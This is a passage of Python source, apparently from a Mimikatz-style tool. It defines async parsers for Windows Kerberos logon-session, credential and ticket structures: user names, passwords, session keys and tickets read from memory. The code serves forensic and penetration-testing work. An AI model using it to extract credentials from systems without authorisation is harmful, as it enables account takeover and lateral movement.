		await reader.align()
		res.unk7  = await FILETIME.loadvalue(reader)
		res.unk8  = await PVOID.loadvalue(reader)
		res.unk8b = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk9  = await FILETIME.loadvalue(reader)
		res.unk11 = await PVOID.loadvalue(reader)
		res.unk12 = await PVOID.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		await reader.align(8)
		
		#input('credentials\n' + hexdump(reader.peek(0x100)))
		res.credentials = await KIWI_KERBEROS_10_PRIMARY_CREDENTIAL.load(reader)
		res.unk14 = await ULONG.loadvalue(reader)
		res.unk15 = await ULONG.loadvalue(reader)
		res.unk16 = await ULONG.loadvalue(reader)
		res.unk17 = await ULONG.loadvalue(reader)
		#//PVOID		unk18 = (reader).value
		await reader.align(8)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await PVOID.loadvalue(reader)
		res.unk23 = await PVOID.loadvalue(reader)
		res.unk24 = await PVOID.loadvalue(reader)
		res.unk25 = await PVOID.loadvalue(reader)
		res.pKeyList = await PVOID.load(reader)
		res.unk26 = await PVOID.loadvalue(reader)
		#input('pKeyList\n' + hexdump(reader.peek(0x100)))
		await reader.align()
		#input('Tickets_1\n' + hexdump(reader.peek(0x100)))
		res.Tickets_1 = await LIST_ENTRY.load(reader)
		res.unk27 = await FILETIME.loadvalue(reader)
		res.Tickets_2 = await LIST_ENTRY.load(reader)
		res.unk28 = await FILETIME.loadvalue(reader)
		res.Tickets_3 = await LIST_ENTRY.load(reader)
		res.unk29 = await FILETIME.loadvalue(reader)
		res.SmartcardInfos = await PVOID.load(reader)
		return res
		
class KIWI_KERBEROS_LOGON_SESSION_10:
	def __init__(self):	
		self.UsageCount = None
		self.unk0 = None
		self.unk1 = None
		self.unk1b = None
		self.unk2 = None
		self.unk4 = None
		self.unk5 = None
		self.unk6 = None
		self.LocallyUniqueIdentifier = None
		self.unk7 = None
		self.unk8 = None
		self.unk8b = None
		self.unk9 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None		
		self.credentials = None
		self.unk14 = None
		self.unk15 = None
		self.unk16 = None
		self.unk17 = None
		#self.unk18 = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.unk23 = None
		self.unk24 = None
		self.unk25 = None
		self.pKeyList = None
		self.unk26 = None
		self.Tickets_1 = None
		self.unk27 = None
		self.Tickets_2 = None
		self.unk28 = None
		self.Tickets_3 = None
		self.unk29 = None
		self.SmartcardInfos = None

	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_LOGON_SESSION_10()
		res.UsageCount = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk0  = await LIST_ENTRY.load(reader)
		res.unk1  = await PVOID.loadvalue(reader)
		res.unk1b = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await FILETIME.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.unk6 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.unk7  = await FILETIME.loadvalue(reader)
		res.unk8  = await PVOID.loadvalue(reader)
		res.unk8b = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk9  = await FILETIME.loadvalue(reader)
		res.unk11 = await PVOID.loadvalue(reader)
		res.unk12 = await PVOID.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)		
		res.credentials = await KIWI_KERBEROS_10_PRIMARY_CREDENTIAL.load(reader)
		res.unk14 = await ULONG.loadvalue(reader)
		res.unk15 = await ULONG.loadvalue(reader)
		res.unk16 = await ULONG.loadvalue(reader)
		res.unk17 = await ULONG.loadvalue(reader)
		#self.unk18 = PVOID(reader).value
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await PVOID.loadvalue(reader)
		res.unk23 = await PVOID.loadvalue(reader)
		res.unk24 = await PVOID.loadvalue(reader)
		res.unk25 = await PVOID.loadvalue(reader)
		res.pKeyList = await PVOID.load(reader)
		res.unk26 = await PVOID.loadvalue(reader)
		res.Tickets_1 = await LIST_ENTRY.load(reader)
		res.unk27 = await FILETIME.loadvalue(reader)
		res.Tickets_2 = await LIST_ENTRY.load(reader)
		res.unk28 = await FILETIME.loadvalue(reader)
		res.Tickets_3 = await LIST_ENTRY.load(reader)
		res.unk29 = await FILETIME.loadvalue(reader)
		res.SmartcardInfos = await PVOID.load(reader)
		return res

class PKIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO
		return p

class KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO:
	def __init__(self):
		self.StructSize = None
		self.isoBlob    = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO()
		res.StructSize = await DWORD.loadvalue(reader)
		await reader.align()
		res.isoBlob    = await PLSAISO_DATA_BLOB.load(reader)  #POINTER!!!! #// aligned =
		return res

class PKIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607(POINTER):	
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607
		return p
		
class KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607:
	def __init__(self):
		self.UserName = None
		self.Domaine = None
		self.unkFunction = None
		self.type = None
		self.Password = None
		self.IsoPassword = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607()
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine  = await LSA_UNICODE_STRING.load(reader)
		res.unkFunction = await PVOID.loadvalue(reader)
		res.type = await DWORD.loadvalue(reader) # // or flags 2 = normal, 1 = ISO(reader).value
		await reader.align()
		res.Password    = await LSA_UNICODE_STRING.load(reader) #	union {
		res.IsoPassword = await KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO.load(reader)
		return res

class PKIWI_KERBEROS_LOGON_SESSION_10_1607(POINTER):	
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_LOGON_SESSION_10_1607()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_LOGON_SESSION_10_1607
		return p

		
class KIWI_KERBEROS_LOGON_SESSION_10_1607:
	def __init__(self):
		self.UsageCount = None
		self.unk0 = None
		self.unk1 = None
		self.unk1b = None
		self.unk2 = None
		self.unk4 = None
		self.unk5 = None
		self.unk6 = None
		self.LocallyUniqueIdentifier = None
		self.unk7 = None
		self.unk8 = None
		self.unk8b = None
		self.unk9 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.credentials = None
		self.unk14 = None
		self.unk15 = None
		self.unk16 = None
		self.unk17 = None
		self.unk18 = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.unk23 = None
		self.pKeyList = None
		self.unk26 = None
		self.Tickets_1 = None
		self.unk27 = None
		self.Tickets_2 = None
		self.unk28 = None
		self.Tickets_3 = None
		self.unk29 = None
		self.SmartcardInfos = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_LOGON_SESSION_10_1607()
		res.UsageCount = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk0 = await LIST_ENTRY.load(reader)
		res.unk1  = await PVOID.loadvalue(reader)
		res.unk1b = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await FILETIME.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.unk6 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.unk7  = await FILETIME.loadvalue(reader)
		res.unk8  = await PVOID.loadvalue(reader)
		res.unk8b = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk9  = await FILETIME.load(reader)
		res.unk11 = await PVOID.loadvalue(reader)
		res.unk12 = await PVOID.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		await reader.align(8)
		res.credentials = await KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607.load(reader)
		res.unk14 = await ULONG.loadvalue(reader)
		res.unk15 = await ULONG.loadvalue(reader)
		res.unk16 = await ULONG.loadvalue(reader)
		res.unk17 = await ULONG.loadvalue(reader)
		res.unk18 = await PVOID.loadvalue(reader)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await PVOID.loadvalue(reader)
		res.unk23 = await PVOID.loadvalue(reader)
		#self.unk24 = PVOID(reader).value
		#self.unk25 = PVOID(reader).value
		await reader.align()
		#reader.read(8+12)
		#input('pkeylist  \n' + hexdump(reader.peek(0x50)))
		res.pKeyList = await PVOID.load(reader)
		res.unk26 = await PVOID.loadvalue(reader)
		res.Tickets_1 = await LIST_ENTRY.load(reader)
		res.unk27 = await FILETIME.loadvalue(reader)
		res.Tickets_2 = await LIST_ENTRY.load(reader)
		res.unk28 = await FILETIME.loadvalue(reader)
		res.Tickets_3 = await LIST_ENTRY.load(reader)
		res.unk29 = await FILETIME.loadvalue(reader)
		res.SmartcardInfos = await PVOID.load(reader)
		return res
		
class KIWI_KERBEROS_LOGON_SESSION_10_1607_X86:
	def __init__(self):
		self.UsageCount = None
		self.unk0 = None
		self.unk1 = None
		self.unk1b = None
		self.unk2 = None
		self.unk4 = None
		self.unk5 = None
		self.unk6 = None
		self.LocallyUniqueIdentifier = None
		self.unk7 = None
		self.unk8 = None
		self.unk8b = None
		self.unk9 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.unkAlign = None
		self.credentials = None
		self.unk14 = None
		self.unk15 = None
		self.unk16 = None
		self.unk17 = None
		self.unk18 = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.unk23 = None
		self.pKeyList = None
		self.unk26 = None
		self.Tickets_1 = None
		self.unk27 = None
		self.Tickets_2 = None
		self.unk28 = None
		self.Tickets_3 = None
		self.unk29 = None
		self.SmartcardInfos = None


	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_LOGON_SESSION_10_1607_X86()
		res.UsageCount = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk0 = await LIST_ENTRY.load(reader)
		res.unk1  = await PVOID.loadvalue(reader)
		res.unk1b = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await FILETIME.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.unk6 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		#input('LocallyUniqueIdentifier\n' + hex(self.LocallyUniqueIdentifier))
		res.unk7  = await FILETIME.loadvalue(reader)
		res.unk8  = await PVOID.loadvalue(reader)
		res.unk8b = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk9  = await FILETIME.loadvalue(reader)
		res.unk11 = await PVOID.loadvalue(reader)
		res.unk12 = await PVOID.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		res.unkAlign = await ULONG.loadvalue(reader)
		#input('credentials  \n' + hexdump(reader.peek(0x200)))
		res.credentials = await KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607.load(reader)
		res.unk14 = await ULONG.loadvalue(reader)
		res.unk15 = await ULONG.loadvalue(reader)
		res.unk16 = await ULONG.loadvalue(reader)
		res.unk17 = await ULONG.loadvalue(reader)
		res.unk18 = await PVOID.loadvalue(reader)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await PVOID.loadvalue(reader)
		res.unk23 = await PVOID.loadvalue(reader)
		#self.unk24 = PVOID(reader).value
		#self.unk25 = PVOID(reader).value
		await reader.align()
		
		res.pKeyList = await PVOID.load(reader)
		res.unk26    = await PVOID.loadvalue(reader)
		#input('Tickets_1  \n' + hexdump(reader.peek(0x200)))
		res.Tickets_1 = await LIST_ENTRY.load(reader)
		res.unk27 = await FILETIME.loadvalue(reader)
		res.Tickets_2 = await LIST_ENTRY.load(reader)
		res.unk28 = await FILETIME.loadvalue(reader)
		res.Tickets_3 = await LIST_ENTRY.load(reader)
		res.unk29 = await FILETIME.loadvalue(reader)
		res.SmartcardInfos = await PVOID.load(reader)
		return res

class PKIWI_KERBEROS_INTERNAL_TICKET_51(POINTER):	
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_INTERNAL_TICKET_51()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_INTERNAL_TICKET_51
		return p

		
class KIWI_KERBEROS_INTERNAL_TICKET_51:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.ServiceName = None
		self.TargetName = None
		self.DomainName = None
		self.TargetDomainName = None
		self.Description = None
		self.AltTargetDomainName = None
		self.ClientName = None
		self.TicketFlags = None
		self.unk2 = None
		self.KeyType = None
		self.Key = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.unk6 = None
		self.unk7 = None
		self.unk8 = None
		self.StartTime = None
		self.EndTime = None
		self.RenewUntil = None
		self.unk9 = None
		self.unk10 = None
		self.domain = None
		self.unk11 = None
		self.strangeNames = None
		self.unk12 = None
		self.TicketEncType = None
		self.TicketKvno = None
		self.Ticket = None

	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_INTERNAL_TICKET_51()
		res.Flink = await PKIWI_KERBEROS_INTERNAL_TICKET_51.load(reader)
		res.Blink = await PKIWI_KERBEROS_INTERNAL_TICKET_51.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.ServiceName = await PKERB_EXTERNAL_NAME.load(reader)
		res.TargetName  = await PKERB_EXTERNAL_NAME.load(reader)
		res.DomainName  = await LSA_UNICODE_STRING.load(reader)
		res.TargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.Description = await LSA_UNICODE_STRING.load(reader)
		res.AltTargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.ClientName = await PKERB_EXTERNAL_NAME.load(reader)
		x = await reader.read(4)
		res.TicketFlags = int.from_bytes(x, byteorder = 'big', signed = False)
		res.unk2    = await ULONG.loadvalue(reader)
		res.KeyType = await ULONG.loadvalue(reader)
		res.Key  = await KIWI_KERBEROS_BUFFER.load(reader)
		res.unk3 = await PVOID.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.unk6 = await PVOID.loadvalue(reader)
		res.unk7 = await PVOID.loadvalue(reader)
		res.unk8 = await PVOID.loadvalue(reader)
		res.StartTime  = await FILETIME.loadvalue(reader)
		res.EndTime    = await FILETIME.loadvalue(reader)
		res.RenewUntil = await FILETIME.loadvalue(reader)
		res.unk9   = await ULONG.loadvalue(reader)
		res.unk10  = await ULONG.loadvalue(reader)
		res.domain = await PCWSTR.loadvalue(reader)
		res.unk11  = await ULONG.loadvalue(reader)
		res.strangeNames = await PVOID.loadvalue(reader)
		res.unk12 = await ULONG.loadvalue(reader)
		res.TicketEncType = await ULONG.loadvalue(reader)
		res.TicketKvno = await ULONG.loadvalue(reader)
		res.Ticket = await KIWI_KERBEROS_BUFFER.load(reader)
		return res

class PKIWI_KERBEROS_INTERNAL_TICKET_52(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_INTERNAL_TICKET_52()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_INTERNAL_TICKET_52
		return p
		

class KIWI_KERBEROS_INTERNAL_TICKET_52:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.ServiceName = None
		self.TargetName = None
		self.DomainName = None
		self.TargetDomainName = None
		self.Description = None
		self.AltTargetDomainName = None
		self.ClientName = None
		self.name0 = None
		self.TicketFlags = None
		self.unk2 = None
		self.KeyType = None
		self.Key = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.StartTime = None
		self.EndTime = None
		self.RenewUntil = None
		self.unk6 = None
		self.unk7 = None
		self.domain = None
		self.unk8 = None
		self.strangeNames = None
		self.unk9 = None
		self.TicketEncType = None
		self.TicketKvno = None
		self.Ticket = None

	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_INTERNAL_TICKET_52()
		res.Flink = await PKIWI_KERBEROS_INTERNAL_TICKET_52.load(reader)
		res.Blink = await PKIWI_KERBEROS_INTERNAL_TICKET_52.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.ServiceName = await PKERB_EXTERNAL_NAME.load(reader)
		res.TargetName  = await PKERB_EXTERNAL_NAME.load(reader)
		res.DomainName  = await LSA_UNICODE_STRING.load(reader)
		res.TargetDomainName    = await LSA_UNICODE_STRING.load(reader)
		res.Description         = await LSA_UNICODE_STRING.load(reader)
		res.AltTargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.ClientName = await PKERB_EXTERNAL_NAME.load(reader)
		res.name0 = await PVOID.loadvalue(reader)
		x = await reader.read(4)
		res.TicketFlags = int.from_bytes(x, byteorder = 'big', signed = False)
		res.unk2 = await ULONG.loadvalue(reader)
		res.KeyType = await ULONG.loadvalue(reader)
		res.Key = await KIWI_KERBEROS_BUFFER.load(reader)
		res.unk3 = await PVOID.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.StartTime = await FILETIME.loadvalue(reader)
		res.EndTime   = await FILETIME.loadvalue(reader)
		res.RenewUntil= await FILETIME.loadvalue(reader)
		res.unk6 = await ULONG.loadvalue(reader)
		res.unk7 = await ULONG.loadvalue(reader)
		res.domain = await PCWSTR.loadvalue(reader)
		res.unk8 = await ULONG.loadvalue(reader)
		res.strangeNames = await PVOID.loadvalue(reader)
		res.unk9 = await ULONG.loadvalue(reader)
		res.TicketEncType = await ULONG.loadvalue(reader)
		res.TicketKvno = await ULONG.load(reader)
		res.Ticket = await KIWI_KERBEROS_BUFFER.load(reader)
		return res

class PKIWI_KERBEROS_INTERNAL_TICKET_60(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_INTERNAL_TICKET_60()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_INTERNAL_TICKET_60
		return p
		

class KIWI_KERBEROS_INTERNAL_TICKET_60:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.ServiceName = None
		self.TargetName = None
		self.DomainName = None
		self.TargetDomainName = None
		self.Description = None
		self.AltTargetDomainName = None
		self.ClientName = None
		self.name0 = None
		self.TicketFlags = None
		self.unk2 = None
		self.KeyType = None
		self.Key = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.StartTime = None
		self.EndTime = None
		self.RenewUntil = None
		self.unk6 = None
		self.unk7 = None
		self.domain = None
		self.unk8 = None
		self.strangeNames = None
		self.unk9 = None
		self.TicketEncType = None
		self.TicketKvno = None
		self.Ticket = None

	
	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_INTERNAL_TICKET_60()
		res.Flink = await PKIWI_KERBEROS_INTERNAL_TICKET_60.load(reader)
		res.Blink = await PKIWI_KERBEROS_INTERNAL_TICKET_60.load(reader)
		res.unk0  = await PVOID.loadvalue(reader)
		res.unk1  = await PVOID.loadvalue(reader)
		res.ServiceName = await PKERB_EXTERNAL_NAME.load(reader)
		res.TargetName  = await PKERB_EXTERNAL_NAME.load(reader)
		res.DomainName  = await LSA_UNICODE_STRING.load(reader)
		res.TargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.Description = await LSA_UNICODE_STRING.load(reader)
		res.AltTargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.ClientName = await PKERB_EXTERNAL_NAME.load(reader)
		res.name0 = await PVOID.loadvalue(reader)
		x = await reader.read(4)
		res.TicketFlags = int.from_bytes(x, byteorder = 'big', signed = False)
		res.unk2    = await ULONG.loadvalue(reader)
		res.KeyType = await ULONG.loadvalue(reader)
		res.Key  = await KIWI_KERBEROS_BUFFER.load(reader)
		res.unk3 = await PVOID.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.StartTime  = await FILETIME.loadvalue(reader)
		res.EndTime    = await FILETIME.loadvalue(reader)
		res.RenewUntil = await FILETIME.loadvalue(reader)
		res.unk6 = await ULONG.loadvalue(reader)
		res.unk7 = await ULONG.loadvalue(reader)
		res.domain = await PCWSTR.loadvalue(reader)
		res.unk8   = await ULONG.loadvalue(reader)
		res.strangeNames = await PVOID.loadvalue(reader)
		res.unk9          = await ULONG.loadvalue(reader)
		res.TicketEncType = await ULONG.loadvalue(reader)
		res.TicketKvno    = await ULONG.loadvalue(reader)
		res.Ticket = await KIWI_KERBEROS_BUFFER.load(reader)
		return res

class PKIWI_KERBEROS_INTERNAL_TICKET_6(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_INTERNAL_TICKET_6()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_INTERNAL_TICKET_6
		return p
		
class KIWI_KERBEROS_INTERNAL_TICKET_6:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.ServiceName = None
		self.TargetName = None
		self.DomainName = None
		self.TargetDomainName = None
		self.Description = None
		self.AltTargetDomainName = None
		self.KDCServer = None
		self.ClientName = None
		self.name0 = None
		self.TicketFlags = None
		self.unk2 = None
		self.KeyType = None
		self.Key = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.StartTime = None
		self.EndTime = None
		self.RenewUntil = None
		self.unk6 = None
		self.unk7 = None
		self.domain = None
		self.unk8 = None
		self.strangeNames = None
		self.unk9 = None
		self.TicketEncType = None
		self.TicketKvno = None
		self.Ticket = None

	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_INTERNAL_TICKET_6()
		res.Flink = await PKIWI_KERBEROS_INTERNAL_TICKET_6.load(reader)
		res.Blink = await PKIWI_KERBEROS_INTERNAL_TICKET_6.load(reader)
		res.unk0  = await PVOID.loadvalue(reader)
		res.unk1  = await PVOID.loadvalue(reader)
		res.ServiceName = await PKERB_EXTERNAL_NAME.load(reader)
		res.TargetName =  await PKERB_EXTERNAL_NAME.load(reader)
		res.DomainName =  await LSA_UNICODE_STRING.load(reader)
		res.TargetDomainName    = await LSA_UNICODE_STRING.load(reader)
		res.Description         = await LSA_UNICODE_STRING.load(reader)
		res.AltTargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.KDCServer           = await LSA_UNICODE_STRING.load(reader) #	//?(reader).value
		res.ClientName          = await PKERB_EXTERNAL_NAME.load(reader)
		res.name0 = await PVOID.loadvalue(reader)
		x = await reader.read(4)
		res.TicketFlags = int.from_bytes(x, byteorder = 'big', signed = False)#ULONG(reader).value
		res.unk2    = await ULONG.loadvalue(reader)
		res.KeyType = await ULONG.loadvalue(reader)
		await reader.align()
		res.Key  = await KIWI_KERBEROS_BUFFER.load(reader)
		res.unk3 = await PVOID.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		res.StartTime  = await FILETIME.loadvalue(reader)
		res.EndTime    = await FILETIME.loadvalue(reader)
		res.RenewUntil = await FILETIME.loadvalue(reader)
		res.unk6 = await ULONG.loadvalue(reader)
		res.unk7 = await ULONG.loadvalue(reader)
		res.domain = await PCWSTR.loadvalue(reader)
		res.unk8 = await ULONG.loadvalue(reader)
		await reader.align()
		res.strangeNames = await PVOID.loadvalue(reader)
		res.unk9          = await ULONG.loadvalue(reader)
		res.TicketEncType = await ULONG.loadvalue(reader)
		res.TicketKvno    = await ULONG.loadvalue(reader)
		await reader.align()
		res.Ticket = await KIWI_KERBEROS_BUFFER.load(reader)
		return res

class PKIWI_KERBEROS_INTERNAL_TICKET_10(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_INTERNAL_TICKET_10()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_INTERNAL_TICKET_10
		return p
		
class KIWI_KERBEROS_INTERNAL_TICKET_10:
	def __init__(self):
		#input('KIWI_KERBEROS_INTERNAL_TICKET_10\n' + hexdump(reader.peek(0x100)))
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.ServiceName = None
		self.TargetName = None
		self.DomainName = None
		self.TargetDomainName = None
		self.Description = None
		self.AltTargetDomainName = None
		self.KDCServer = None
		self.unk10586_d = None
		self.ClientName = None
		self.name0 = None
		self.TicketFlags = None
		self.unk2 = None
		self.KeyType = None
		self.Key = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.StartTime = None
		self.EndTime = None
		self.RenewUntil = None
		self.unk6 = None
		self.unk7 = None
		self.domain = None
		self.unk8 = None
		self.strangeNames = None
		self.unk9 = None
		self.TicketEncType = None
		self.TicketKvno = None
		self.Ticket = None

	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_INTERNAL_TICKET_10()
		res.Flink = await PKIWI_KERBEROS_INTERNAL_TICKET_10.load(reader)
		res.Blink = await PKIWI_KERBEROS_INTERNAL_TICKET_10.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.ServiceName = await PKERB_EXTERNAL_NAME.load(reader)
		res.TargetName  = await PKERB_EXTERNAL_NAME.load(reader)
		res.DomainName  = await LSA_UNICODE_STRING.load(reader)
		res.TargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.Description = await LSA_UNICODE_STRING.load(reader)
		res.AltTargetDomainName = await LSA_UNICODE_STRING.load(reader)
		res.KDCServer  = await LSA_UNICODE_STRING.load(reader)#	//?(reader).value
		res.unk10586_d = await LSA_UNICODE_STRING.load(reader)#	//?(reader).value
		res.ClientName = await PKERB_EXTERNAL_NAME.load(reader)
		res.name0 = await PVOID.loadvalue(reader)
		x = await reader.read(4)
		res.TicketFlags = int.from_bytes(x, byteorder = 'big', signed = False)
		res.unk2 = await ULONG.loadvalue(reader)
		res.KeyType = await ULONG.loadvalue(reader)
		await reader.align()
		res.Key  = await KIWI_KERBEROS_BUFFER.load(reader)
		res.unk3 = await PVOID.loadvalue(reader)
		res.unk4 = await PVOID.loadvalue(reader)
		res.unk5 = await PVOID.loadvalue(reader)
		await reader.align(8)
		res.StartTime  = await FILETIME.loadvalue(reader)
		res.EndTime    = await FILETIME.loadvalue(reader)
		res.RenewUntil = await FILETIME.loadvalue(reader)
		res.unk6 = await ULONG.loadvalue(reader)
		res.unk7 = await ULONG.loadvalue(reader)
		res.domain = await PCWSTR.loadvalue(reader)
		res.unk8   = await ULONG.loadvalue(reader)
		await reader.align()
		res.strangeNames  = await PVOID.loadvalue(reader)
		res.unk9          = await ULONG.loadvalue(reader)
		res.TicketEncType = await ULONG.loadvalue(reader)
		res.TicketKvno    = await ULONG.loadvalue(reader)
		await reader.align()
		res.Ticket = await KIWI_KERBEROS_BUFFER.load(reader)

class PKIWI_KERBEROS_INTERNAL_TICKET_11(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_KERBEROS_INTERNAL_TICKET_11()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_KERBEROS_INTERNAL_TICKET_11
		return p

		
class KIWI_KERBEROS_INTERNAL_TICKET_11:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.ServiceName = None
		self.TargetName = None
		self.DomainName = None
		self.TargetDomainName = None
		self.Description = None
		self.AltTargetDomainName = None
		self.KDCServer = None
		self.unk10586_d = None
		self.ClientName = None
		self.name0 = None
		self.TicketFlags = None
		self.unk2 = None
		self.unk14393_0 = None
		self.unk2x = None
		self.KeyType = None
		self.Key = None
		self.unk14393_1 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.StartTime = None
		self.EndTime = None
		self.RenewUntil = None
		self.unk6 = None
		self.unk7 = None
		self.domain = None
		self.unk8 = None
		self.strangeNames = None
		self.unk9 = None
		self.TicketEncType = None
		self.TicketKvno = None
		self.Ticket = None
	

	@staticmethod
	async def load(reader):
		res = KIWI_KERBEROS_INTERNAL_TICKET_11()
		res.Flink = await PKIWI_KERBEROS_INTERNAL_TICKET_11.load(reader)
		res.Blink = await PKIWI_KERBEROS_INTERNAL_TICKET_11.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
